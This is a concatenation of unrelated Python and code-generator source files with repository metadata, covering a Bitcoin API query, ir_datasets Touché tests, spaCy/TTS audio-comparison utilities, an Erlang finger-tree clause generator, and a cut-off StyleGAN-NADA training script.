"usage_type": "attribute"
},
{
"api_name": "os.path",
"line_number": 260,
"usage_type": "name"
},
{
"api_name": "platereader.statusmessage.StatusMessage",
"line_number": 261,
"usage_type": "call"
},
{
"api_name": "platereader.statusmessage.Severity.warning",
"line_number": 266,
"usage_type": "attribute"
},
{
"api_name": "platereader.statusmessage.Severity",
"line_number": 266,
"usage_type": "name"
},
{
"api_name": "json.dumps",
"line_number": 268,
"usage_type": "call"
},
{
"api_name": "bz2.BZ2File",
"line_number": 269,
"usage_type": "call"
},
{
"api_name": "platereader.replicate.Replicate",
"line_number": 349,
"usage_type": "argument"
},
{
"api_name": "platereader.replicate.Replicate",
"line_number": 475,
"usage_type": "call"
},
{
"api_name": "platereader.statusmessage.StatusMessage",
"line_number": 497,
"usage_type": "call"
},
{
"api_name": "platereader.statusmessage.Severity.failed",
"line_number": 501,
"usage_type": "attribute"
},
{
"api_name": "platereader.statusmessage.Severity",
"line_number": 501,
"usage_type": "name"
},
{
"api_name": "platereader.statusmessage.StatusMessage",
"line_number": 508,
"usage_type": "call"
},
{
"api_name": "platereader.statusmessage.Severity.failed",
"line_number": 512,
"usage_type": "attribute"
},
{
"api_name": "platereader.statusmessage.Severity",
"line_number": 512,
"usage_type": "name"
},
{
"api_name": "platereader.statusmessage.StatusMessage",
"line_number": 514,
"usage_type": "call"
},
{
"api_name": "platereader.statusmessage.StatusMessage",
"line_number": 620,
"usage_type": "call"
},
{
"api_name": "platereader.statusmessage.Severity.warning",
"line_number": 624,
"usage_type": "attribute"
},
{
"api_name": "platereader.statusmessage.Severity",
"line_number": 624,
"usage_type": "name"
},
{
"api_name": "platereader.statusmessage.StatusMessage",
"line_number": 656,
"usage_type": "call"
},
{
"api_name": "platereader.statusmessage.Severity.warning",
"line_number": 661,
"usage_type": "attribute"
},
{
"api_name": "platereader.statusmessage.Severity",
"line_number": 661,
"usage_type": "name"
},
{
"api_name": "platereader.replicate.Replicate",
"line_number": 746,
"usage_type": "call"
},
{
"api_name": "platereader.csvunicode.CsvFileUnicodeWriter",
"line_number": 1295,
"usage_type": "call"
},
{
"api_name": "platereader.replicate.Replicate.growthrateToDoublingTime",
"line_number": 1321,
"usage_type": "call"
},
{
"api_name": "platereader.replicate.Replicate",
"line_number": 1321,
"usage_type": "name"
},
{
"api_name": "platereader.replicate.Replicate.growthrateToDoublingTime",
"line_number": 1322,
"usage_type": "call"
},
{
"api_name": "platereader.replicate.Replicate",
"line_number": 1322,
"usage_type": "name"
},
{
"api_name": "platereader.csvunicode.CsvFileUnicodeWriter",
"line_number": 1461,
"usage_type": "call"
},
{
"api_name": "platereader.csvunicode.CsvFileUnicodeWriter",
"line_number": 1565,
"usage_type": "call"
},
{
"api_name": "platereader.csvunicode.CsvFileUnicodeReader",
"line_number": 1621,
"usage_type": "call"
}
] |
19637644362
|
import requests
import datetime
response = requests.get("https://blockchain.info/rawaddr/42e58ccd620fab780e46095f4b3f6987aa253219")
data = response.json()
first_tr_id = data["txs"][0]["hash"]
first_tr_time = data["txs"][0]["time"]
a = [1, 2, 3, 4]
for n in range(len(a)):
print(a[n])
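
# Illustrative continuation (hedged sketch): the two fields extracted above are never
# printed; the lines below would make them visible. Treating 'time' as a Unix
# timestamp is an assumption based on how the code above uses the response.
# print("first transaction hash:", first_tr_id)
# print("first transaction time:", datetime.datetime.fromtimestamp(first_tr_time))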
|
maciek1066/training
|
bitcoin_api.py
|
bitcoin_api.py
|
py
| 294 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "requests.get",
"line_number": 4,
"usage_type": "call"
}
] |
30614657486
|
from unittest import main
from re import compile
from ir_datasets.formats import ToucheQuery, TrecQrel, ToucheTitleQuery
from ir_datasets.formats.touche import ToucheQualityQrel
from test.integration.base import DatasetIntegrationTest
class TestTouche(DatasetIntegrationTest):
# noinspection PyTypeChecker
def test_queries(self):
self._test_queries(
"argsme/2020-04-01/touche-2020-task-1",
count=49,
items={
0: ToucheQuery(
query_id="1",
title="Should teachers get tenure?",
description=compile("A user has heard that some countries do give teach.{159}teachers vs. university professors is of interest\."),
narrative=compile("Highly relevant arguments make a clear statement a.{181}the situation of teachers' financial independence\."),
),
48: ToucheQuery(
query_id="50",
title="Should everyone get a universal basic income?",
description=compile("Redistribution of wealth is a fundamental concept .{93}ver, a user wonders whether this truly would help\."),
narrative=compile("Highly relevant arguments take a clear stance towa.{134}mentioning universal basic income only in passing\."),
),
}
)
self._test_queries(
"argsme/1.0/touche-2020-task-1/uncorrected",
count=49,
items={
0: ToucheQuery(
query_id="1",
title="Should teachers get tenure?",
description=compile("A user has heard that some countries do give teach.{159}teachers vs. university professors is of interest\."),
narrative=compile("Highly relevant arguments make a clear statement a.{181}the situation of teachers' financial independence\."),
),
48: ToucheQuery(
query_id="50",
title="Should everyone get a universal basic income?",
description=compile("Redistribution of wealth is a fundamental concept .{93}ver, a user wonders whether this truly would help\."),
narrative=compile("Highly relevant arguments take a clear stance towa.{134}mentioning universal basic income only in passing\."),
),
}
)
self._test_queries(
"argsme/2020-04-01/touche-2020-task-1/uncorrected",
count=49,
items={
0: ToucheQuery(
query_id="1",
title="Should teachers get tenure?",
description=compile("A user has heard that some countries do give teach.{159}teachers vs. university professors is of interest\."),
narrative=compile("Highly relevant arguments make a clear statement a.{181}the situation of teachers' financial independence\."),
),
48: ToucheQuery(
query_id="50",
title="Should everyone get a universal basic income?",
description=compile("Redistribution of wealth is a fundamental concept .{93}ver, a user wonders whether this truly would help\."),
narrative=compile("Highly relevant arguments take a clear stance towa.{134}mentioning universal basic income only in passing\."),
),
}
)
self._test_queries(
"clueweb12/touche-2020-task-2",
count=50,
items={
0: ToucheQuery(
query_id="1",
title="What is the difference between sex and love?",
description=compile("A potentially younger user has heard people talk a.{147}ontrast, what characterizes a loving relationship\."),
narrative=compile("Relevant documents will contain some description o.{155}f what people are looking for in either direction\."),
),
49: ToucheQuery(
query_id="50",
title="Whose salary is higher: basketball or soccer players?",
description=compile("A young married couple raises a 14-year old boy wh.{313}income to players in different parts of the world\."),
narrative=compile("Highly relevant documents provide information on a.{496}iptions of basketball and soccer are not relevant\."),
),
}
)
self._test_queries(
"argsme/2020-04-01/touche-2021-task-1",
count=50,
items={
0: ToucheTitleQuery(
query_id="51",
title="Do we need sex education in schools?"
),
49: ToucheTitleQuery(
query_id="100",
title="Do we need cash?"
),
}
)
self._test_queries(
"clueweb12/touche-2021-task-2",
count=50,
items={
0: ToucheQuery(
query_id="51",
title="What is better at reducing fever in children, Ibuprofen or Aspirin?",
description=compile("Younger parents have their 8-year old child sick\. .{400}en and aspirin for reducing the fever in children\."),
narrative=compile("Relevant documents will describe ibuprofen, aspiri.{258} or ingredients of the medicines are not relevant\."),
),
49: ToucheQuery(
query_id="100",
title="Should I learn Python or R for data analysis?",
description=compile("Wondering whether you should use Python or R for d.{318}ore useful, flexible, easy to learn and efficient\."),
narrative=compile("Relevant documents should compare two programming .{430}re not related to data analysis, are not relevant\."),
),
}
)
def test_qrels(self):
self._test_qrels(
"argsme/2020-04-01/touche-2020-task-1",
count=2298,
items={
0: TrecQrel(
query_id="1",
doc_id="S197beaca-A971412e6",
relevance=0,
iteration="0"
),
2297: TrecQrel(
query_id="50",
doc_id="Sffdf2e2e-A307df259",
relevance=2,
iteration="0"
),
}
)
self._test_qrels(
"argsme/1.0/touche-2020-task-1/uncorrected",
count=2964,
items={
0: TrecQrel(
query_id="1",
doc_id="197beaca-2019-04-18T11:28:59Z-00001-000",
relevance=4,
iteration="0"
),
2963: TrecQrel(
query_id="50",
doc_id="799d051-2019-04-18T11:47:02Z-00000-000",
relevance=-2,
iteration="Q0"
),
}
)
self._test_qrels(
"argsme/2020-04-01/touche-2020-task-1/uncorrected",
count=2298,
items={
0: TrecQrel(
query_id="1",
doc_id="S21dc5a14-A8b896cb0",
relevance=4,
iteration="0"
),
2297: TrecQrel(
query_id="50",
doc_id="Sffdf2e2e-A307df259",
relevance=2,
iteration="0"
),
}
)
self._test_qrels(
"clueweb12/touche-2020-task-2",
count=1783,
items={
0: TrecQrel(
query_id="1",
doc_id="clueweb12-0001wb-05-12311",
relevance=0,
iteration="0"
),
1782: TrecQrel(
query_id="50",
doc_id="clueweb12-0206wb-00-16297",
relevance=0,
iteration="0"
),
}
)
self._test_qrels(
"argsme/2020-04-01/touche-2021-task-1",
count=3711,
items={
0: ToucheQualityQrel(
query_id="94",
doc_id="S522c7c3b-A8a87130b",
relevance=2,
quality=2,
iteration="0"
),
3710: ToucheQualityQrel(
query_id="91",
doc_id="Sf0770da-A760eca8e",
relevance=0,
quality=1,
iteration="0"
),
}
)
self._test_qrels(
"clueweb12/touche-2021-task-2",
count=2076,
items={
0: ToucheQualityQrel(
query_id="54",
doc_id="clueweb12-0205wb-64-11095",
relevance=0,
quality=0,
iteration="0"
),
2075: ToucheQualityQrel(
query_id="86",
doc_id="clueweb12-0008wb-85-29079",
relevance=0,
quality=0,
iteration="0"
),
}
)
if __name__ == "__main__":
main()
|
Heyjuke58/ir_datasets
|
test/integration/touche.py
|
touche.py
|
py
| 9,700 |
python
|
en
|
code
| null |
github-code
|
6
|
[
{
"api_name": "test.integration.base.DatasetIntegrationTest",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "ir_datasets.formats.ToucheQuery",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.ToucheQuery",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.ToucheQuery",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.ToucheQuery",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.ToucheQuery",
"line_number": 53,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 56,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 57,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.ToucheQuery",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 62,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.ToucheQuery",
"line_number": 71,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 74,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 75,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.ToucheQuery",
"line_number": 77,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 80,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 81,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.ToucheTitleQuery",
"line_number": 89,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.ToucheTitleQuery",
"line_number": 93,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.ToucheQuery",
"line_number": 103,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 106,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 107,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.ToucheQuery",
"line_number": 109,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 112,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 113,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.TrecQrel",
"line_number": 123,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.TrecQrel",
"line_number": 129,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.TrecQrel",
"line_number": 141,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.TrecQrel",
"line_number": 147,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.TrecQrel",
"line_number": 159,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.TrecQrel",
"line_number": 165,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.TrecQrel",
"line_number": 177,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.TrecQrel",
"line_number": 183,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.touche.ToucheQualityQrel",
"line_number": 195,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.touche.ToucheQualityQrel",
"line_number": 202,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.touche.ToucheQualityQrel",
"line_number": 215,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.touche.ToucheQualityQrel",
"line_number": 222,
"usage_type": "call"
},
{
"api_name": "unittest.main",
"line_number": 234,
"usage_type": "call"
}
] |
9272119407
|
import os
import numpy as np
import spacy
import re
import json
import pyttsx3  # TODO: replace with librosa-based synthesis
import librosa
from fastdtw import fastdtw
from gtts import gTTS
from scipy.spatial.distance import euclidean
import shutil
import config
def create_folder_if_not_exists(folder_path):
if not os.path.exists(folder_path):
os.makedirs(folder_path)
def move_files(source_filepath, destination_directory): #note that one is filepath and other is directory
shutil.move(source_filepath, destination_directory)
# Optional: Check if the file was moved successfully
if os.path.exists(source_filepath):
print("File move failed.")
def return_each_files_path(subfolder_path, return_type='full path'):
if return_type == 'full path':
for root, _, files in os.walk(subfolder_path):
for file in files:
yield os.path.join(root, file)
elif return_type == 'filename':
for root, _, files in os.walk(subfolder_path):
for file in files:
yield file
# Usage example:
# subfolder_path = '/path/to/your/subfolder'
# for path in return_each_files_path(subfolder_path):
# print(path)
def extract_data_from_json(file_path):
try:
with open(file_path, "r") as file:
data = json.load(file)
return data
except FileNotFoundError:
print(f"File '{file_path}' not found.")
except json.JSONDecodeError as e:
print(f"Error decoding JSON: {e}")
except ValueError as e:
print(e,"file not found")
except Exception as e:
print(f"An error occurred: {e}")
def filter_entities(doc, label):
filtered_entities = [ent.text for ent in doc.ents if ent.label_ == label]
return filtered_entities
def save_as_json(data, file_name, subdirectory):
"""
Save a dictionary or list as a JSON file in a subdirectory.
If a file with the same name exists, append the data to it.
Args:
- data: The dictionary or list to be saved.
- file_name: The name of the JSON file (without the .json extension).
- subdirectory: The name of the subdirectory where the JSON file will be saved.
Returns:
- The full path to the saved JSON file if successful, or None if there was an error.
"""
try:
# Create the subdirectory if it doesn't exist
if not os.path.exists(subdirectory):
os.makedirs(subdirectory)
# Construct the full file path
file_path = os.path.join(subdirectory, f"{file_name}.json")
# Initialize existing_data as an empty list if the file doesn't exist
existing_data = []
# If the file already exists, load its contents
if os.path.exists(file_path):
with open(file_path, 'r') as existing_file:
existing_data = json.load(existing_file)
# If data is a dictionary, append it as is; if it's a list, extend the list
if isinstance(data, dict):
existing_data.update(data)
elif isinstance(data, list):
existing_data.extend(data)
# Write the combined data to the JSON file
with open(file_path, 'w') as json_file:
json.dump(existing_data, json_file, indent=4)
print(f"Data saved or appended to {file_path}")
return file_path # Return the saved file path
except Exception as e:
print(f"An error occurred in saving json: {str(e)}")
print(f"An error occurred in saving json: {str(e)}")
return None
# # Example usage^:
# data_to_append = {"city": "Los Angeles", "zipcode": "90001"}
# subdirectory_name = "data_folder"
# # Save or append the data to a JSON file in the subdirectory and get the saved path
# saved_path = save_as_json(data_to_append, "person_data", subdirectory_name)
# if saved_path:
# print(f"Data saved or appended at: {saved_path}")
# else:
# print("Failed to save or append data.")
class TextProcessor:
def __init__(self, chunksize = 50000):
self.chunksize = chunksize
self.nlp = spacy.load("en_core_web_lg",disable=["tagger", "parser", "textcat"])
def read_file(self):
with open(self.file_path, "r",errors='ignore') as file:
file_contents = file.read()
return file_contents
def clean_text(self, text):
        cleaned_text = re.sub(r'\n', '. ', text)
        #cleaned_text = re.sub(r'[^\n]', '. ', text)
        cleaned_text = re.sub(r'[&]', ' and ', cleaned_text)
        cleaned_text = re.sub(r'[^a-zA-Z.();,?\'\"]', ' ', cleaned_text)
return cleaned_text
def tokenize_text(self, text):
doc = self.nlp(text)
return doc
def process_file(self,file_path):
self.file_path= file_path
file_contents = self.read_file()
cleaned_text = self.clean_text(file_contents)
splitted_text = cleaned_text[:50000]
#return self.tokenize_text(splitted_text)
self.chunksize = 50000
# # Split the document into chunks of 50,000 characters or less
# print("splitting book into chunks..")
# book_chunks = [cleaned_text[i:i + self.chunksize] for i in range(0, len(cleaned_text), self.chunksize)]
# print("tokenising each chunks..")
# doc_of_each_chunk=[self.tokenize_text(each_chunk) for each_chunk in book_chunks]
# return doc_of_each_chunk
for i in range(0, len(cleaned_text), self.chunksize):
text_chunk = cleaned_text[i:i + self.chunksize]
yield text_chunk
class AudioConverter():
def __init__(self, word, engine, save_directory= config.paths["save_directory"]):
word = word.lower()
file_path = save_directory+os.sep+ f"{word}{config.audio_format}"
self.file_path = file_path
self.word = word
self.engine = engine
def process(self):
if self.engine == "gtts":
try: #consider this as an additional filter for collected names
tts = gTTS(self.word)
tts.save(self.file_path)
except Exception as e:
print(f"unable to save '{self.word}' due to : {str(e)}")
elif self.engine == "pyttsx3":#note that this have to be deleted lately because the storage is high(ten times larger than gtts, but quicker and offline)
file_name = f"{self.word}{config.audio_format}"
engine = pyttsx3.init()
engine.save_to_file(self.word, self.file_path)
engine.runAndWait()
print("sended file path= ", self.file_path)
return self.file_path
class WordsComparer():
def __init__(self, audio1_path='',audio2_path='') -> None:
#print("audio path= ", audio1_path)
self.audio1_path = audio1_path
self.audio2_path= audio2_path
#self.file_name = f"{self.word}.wav"
# def convert_to_audio(self, word, engine):
# if engine == "gtts":
# file_path = os.path.join('data_christian','audio_data','doc_audio_data',f"{word}.wav")
# try: #consider this as an additional filter for collected names
# tts = gTTS(word)
# tts.save(file_path)
# except Exception as e:
# print(f"unable to save '{word}' due to : {str(e)}")
# elif engine == "pyttsx3":#note that this have to be deleted lately because the storage is high(ten times larger than gtts, but quicker and offline)
# file_name = f"{word}.wav"
# engine = pyttsx3.init()
# engine.save_to_file(word, file_name)
# engine.runAndWait()
# return file_path
def audio_to_mfcc(self, audio_file_path):
# Load the audio files #r"data\audio_data\sample_audio_data\output_audio1.wav"
audio, sr_doc = librosa.load(audio_file_path, sr= 24000)
# Extract MFCC features
mfcc_doc = librosa.feature.mfcc(y= audio, sr= sr_doc)
# Transpose MFCCs for compatibility with DTW
mfcc_doc = mfcc_doc.T
return mfcc_doc
def compare_two_MFCC(self,mfcc1,mfcc2): #get more information about this
def calculate_distance(mfcc1,mfcc2):
if mfcc1.shape[1] != mfcc2.shape[1]:
raise ValueError("Number of features (columns) must be the same for both sequences")
# Calculate the DTW distance using the fastdtw function
distance, _ = fastdtw(mfcc1, mfcc2)
# Calculate DTW distance and path
#print("mfcc1 shape= ",mfcc1.shape[1],"distance= ",distance)
#print(distance)
return distance
distance = calculate_distance(mfcc1,mfcc2)
#print(distance)
# Normalize the distance (optional)
normalised_distance = distance / min(len(mfcc1) , len(mfcc2))
normalised_distance = round(normalised_distance,2)
return normalised_distance
# def word_to_mfcc(self, word):
# audio_converter = AudioConverter(word,'gtts')
# file_path = audio_converter.process()
# mfcc_file = self.audio_to_mfcc(file_path)
# #os.remove(file_name)
# return mfcc_file
def process(self):
mfcc1 = self.audio_to_mfcc(self.audio1_path)
mfcc2 = self.audio_to_mfcc(self.audio2_path)
# mfcc1= self.word_to_mfcc(self.word)
# mfcc2= self.word_to_mfcc(self.word2)
distance= self.compare_two_MFCC(mfcc1=mfcc1, mfcc2=mfcc2)
return distance
if __name__ == "__main__":
file_path1 = AudioConverter(word='k',engine='gtts').process()
file_path2 = AudioConverter(word='vanakkam',engine='gtts').process()
distance = WordsComparer(file_path1,file_path2).process()
print(distance,file_path2)
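# Usage sketch for TextProcessor (illustration only; 'book.txt' and 'data_folder' are
# hypothetical paths, not part of the original code):
# processor = TextProcessor()
# for chunk in processor.process_file('book.txt'):
#     doc = processor.tokenize_text(chunk)
#     names = filter_entities(doc, 'PERSON')
#     save_as_json(names, 'person_names', 'data_folder')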
|
RamSankarTheDeveloper/TeenyTinyTitleTrove
|
utils.py
|
utils.py
|
py
| 10,032 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "os.path.exists",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "os.makedirs",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "shutil.move",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 26,
"usage_type": "attribute"
},
{
"api_name": "os.walk",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 34,
"usage_type": "attribute"
},
{
"api_name": "os.walk",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "json.load",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "json.JSONDecodeError",
"line_number": 52,
"usage_type": "attribute"
},
{
"api_name": "os.path.exists",
"line_number": 79,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 79,
"usage_type": "attribute"
},
{
"api_name": "os.makedirs",
"line_number": 80,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 83,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 83,
"usage_type": "attribute"
},
{
"api_name": "os.path.exists",
"line_number": 89,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 89,
"usage_type": "attribute"
},
{
"api_name": "json.load",
"line_number": 91,
"usage_type": "call"
},
{
"api_name": "json.dump",
"line_number": 101,
"usage_type": "call"
},
{
"api_name": "spacy.load",
"line_number": 125,
"usage_type": "call"
},
{
"api_name": "re.sub",
"line_number": 133,
"usage_type": "call"
},
{
"api_name": "re.sub",
"line_number": 135,
"usage_type": "call"
},
{
"api_name": "re.sub",
"line_number": 136,
"usage_type": "call"
},
{
"api_name": "re.sub",
"line_number": 137,
"usage_type": "call"
},
{
"api_name": "re.sub",
"line_number": 139,
"usage_type": "call"
},
{
"api_name": "re.sub",
"line_number": 140,
"usage_type": "call"
},
{
"api_name": "config.paths",
"line_number": 168,
"usage_type": "attribute"
},
{
"api_name": "os.sep",
"line_number": 170,
"usage_type": "attribute"
},
{
"api_name": "config.audio_format",
"line_number": 170,
"usage_type": "attribute"
},
{
"api_name": "gtts.gTTS",
"line_number": 178,
"usage_type": "call"
},
{
"api_name": "config.audio_format",
"line_number": 184,
"usage_type": "attribute"
},
{
"api_name": "pyttsx3.init",
"line_number": 185,
"usage_type": "call"
},
{
"api_name": "librosa.load",
"line_number": 221,
"usage_type": "call"
},
{
"api_name": "librosa.feature.mfcc",
"line_number": 224,
"usage_type": "call"
},
{
"api_name": "librosa.feature",
"line_number": 224,
"usage_type": "attribute"
},
{
"api_name": "fastdtw.fastdtw",
"line_number": 236,
"usage_type": "call"
}
] |
16898559994
|
#!/usr/bin/env python3
import itertools
def print_header(x, y, z = None):
print("join_digits(", seq2digit(x), ", ", seq2some(y), ", ", seq2digit(z), ") ->", sep="")
def produce(seq):
while seq:
if len(seq) == 4:
yield seq2node(seq[:2])
yield seq2node(seq[2:])
break
yield seq2node(seq[:3])
seq = seq[3:]
def print_body(seq):
print(" ", seq2some(produce(seq)), ";", sep="")
def seq2digit(seq):
return "{{{}}}".format(", ".join(itertools.chain("_", seq)))
def seq2some(seq):
return "{{{}}}".format(", ".join(seq))
def seq2node(seq):
return "node({})".format(", ".join(seq))
print("-spec join_digits(digit(X), some(X), digit(X)) -> some(node(X)) when X :: desc().")
var_x = 'ABCD'
var_some = 'EFGH'
var_z = 'IJKL'
MAX = 12
MAXONE = 4
for size_some in range(0, MAXONE + 1):
for size_x in range(1, MAXONE + 1):
for size_z in range(1, MAXONE + 1):
x, some, z = var_x[:size_x], var_some[:size_some], var_z[:size_z]
print_header(x, some, z)
print_body(x + some + z)
print("join_digits(Left, Some, Right) -> error(function_clause, [Left, Some, Right]).")
|
platbox/nanometer
|
py/ftree_generate.py
|
ftree_generate.py
|
py
| 1,194 |
python
|
en
|
code
| 3 |
github-code
|
6
|
[
{
"api_name": "itertools.chain",
"line_number": 24,
"usage_type": "call"
}
] |
30814462620
|
"""
Script Description
- train NADA model
Usage
- $ python train_nada.py --config_path [config_path] --name [exp_name] --suppress
- $ cat [config_path] | python train_nada.py --pipe --name [exp_name] --suppress
Author
- Minsu Kim
- Dongha Kim
History
- 230419 : MINSU , init
- adaptation loop
- code skeleton
- 230422 : MINSU , implement
- code corresponding to GET3D application 4.3.2
    - 230422 : DONGHA , convert to distributed script
Reference
- StyleGAN-NADA Github
https://github.com/rinongal/StyleGAN-nada/blob/main/ZSSGAN/train.py
"""
import sys
import os
import time
import tempfile
import yaml
import numpy as np
import torch
from torchvision.utils import save_image
import logging
import dist_util
from model_engine import find_get3d
from nada import YAIverseGAN
from functional import unfreeze_generator_layers, generate_custom
if find_get3d():
from torch_utils import custom_ops
_SEED = 0
_SELECT = 50
def get_logger(exp_name, outdir, rank=0):
logger = logging.getLogger(exp_name)
if rank != 0:
logger.disabled = True
else:
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(formatter)
stream_handler.setLevel(logging.DEBUG)
logger.addHandler(stream_handler)
file_handler = logging.FileHandler(f'{outdir}/{exp_name}_{time.strftime("%Y-%m-%d-%H-%M", time.gmtime())}.log')
file_handler.setFormatter(formatter)
file_handler.setLevel(logging.DEBUG)
logger.addHandler(file_handler)
return logger
def subprocess_fn(rank, config, args, temp_dir):
if config['GLOBAL']['gpus'] > 1:
dist_util.setup_dist(temp_dir, rank, config['GLOBAL']['gpus'])
if rank != 0:
custom_ops.verbosity = 'none'
if rank == 0:
print("START ! EXP NAME : ", args.name)
print("SETTING : LOAD YaiverseGAN")
with dist_util.synchronized_ops():
net = YAIverseGAN(config)
unfreeze_generator_layers(net.generator_trainable, [], [])
if dist_util.get_world_size() > 1:
ddp_net = torch.nn.parallel.DistributedDataParallel(
net,
device_ids=[dist_util.dev()],
output_device=dist_util.dev(),
broadcast_buffers=True,
bucket_cap_mb=256,
find_unused_parameters=True,
)
else:
ddp_net = net
device, outdir, batch, n_vis, sample_1st, sample_2nd, iter_1st, iter_2nd, lr, \
output_interval, save_interval, gradient_clip_threshold = net.get_loop_settings()
g_optim = torch.optim.Adam(
net.generator_trainable.parameters(),
lr=lr,
betas=(0.9, 0.99),
)
with dist_util.synchronized_ops():
if rank == 0:
sample_dir = os.path.join(outdir, "sample")
ckpt_dir = os.path.join(outdir, "checkpoint")
os.makedirs(outdir, exist_ok=True)
os.makedirs(sample_dir, exist_ok=True)
os.makedirs(ckpt_dir, exist_ok=True)
torch.manual_seed(_SEED)
np.random.seed(_SEED)
logger = get_logger(args.name, outdir, rank=rank)
logger.info(f'EXP NAME : {args.name} | CONFIG : {args.config_path} | SEED : {_SEED} | BATCH : {batch}')
z_dim = 512 # Fixed value
fixed_z_geo = torch.randn(n_vis, z_dim, device=device) # for eval
fixed_z_tex = torch.randn(n_vis, z_dim, device=device)
grid_rows = int(n_vis ** 0.5)
eval_camera = net.generator_frozen.synthesis.generate_rotate_camera_list(n_batch=1)[4].repeat(n_vis, 1, 1, 1)
# ------------------ Training 1st --------------
# latent z should be 2 -> for geo , tex
# different n_batch latents per gpu <- equals: seeing n_batch * n_gpu latents
latent_generator = torch.Generator(device)
latent_generator.manual_seed(rank)
sample_z_geo = torch.randn(sample_1st, z_dim, device=device, generator=latent_generator)
sample_z_tex = torch.randn(sample_1st, z_dim, device=device, generator=latent_generator)
sample_z_geo_chunks = torch.split(sample_z_geo, batch, dim=0)
sample_z_tex_chunks = torch.split(sample_z_tex, batch, dim=0)
logger.info(f'START TRAINING LOOP')
min_loss_store = []
for epoch in range(iter_1st):
for i, (z_geo_chunk, z_tex_chunk) in enumerate(zip(sample_z_geo_chunks, sample_z_tex_chunks)):
# training
ddp_net.train()
# memory-efficient forward : support n_view rendering
_, loss = ddp_net(z_tex_chunk, z_geo_chunk)
if epoch == iter_1st - 1: # to choose 50 latents with low loss value
loss_val = loss.cpu().detach().numpy().tolist()
min_loss_store += loss_val
loss = loss.mean()
ddp_net.zero_grad()
loss.backward()
if gradient_clip_threshold == -1:
pass
else:
torch.nn.utils.clip_grad_norm_(net.generator_trainable.parameters(), gradient_clip_threshold)
g_optim.step()
logger.info(f'EPOCH : {epoch} | STEP : {i:0>4} | LOSS : {loss:.5f}')
# evaluation & save results | save checkpoints
with dist_util.synchronized_ops():
if rank == 0:
if i % output_interval == 0:
ddp_net.eval()
with torch.no_grad():
sampled_dst, _ = generate_custom(
net.generator_trainable,
fixed_z_tex, fixed_z_geo,
use_mapping=True, mode='layer', camera=eval_camera
)
rgb = sampled_dst[:, :-1]
mask = sampled_dst[:, -1:]
bg = torch.ones(rgb.shape, device=device)
bg *= 0.0001 # for better background
new_dst = rgb*mask + bg*(1-mask)
save_image(
new_dst,
os.path.join(sample_dir, f"Iter1st_Epoch-{epoch}_Step-{i:0>4}.png"),
nrow=grid_rows,
normalize=True,
range=(-1, 1),
)
logger.info(f'ITER 1st | EPOCH : {epoch} | STEP : {i:0>4} | >> Save images ...')
if i % save_interval == 0 and not args.suppress:
torch.save(
{
"g_ema": net.generator_trainable.state_dict(),
"g_optim": g_optim.state_dict(),
},
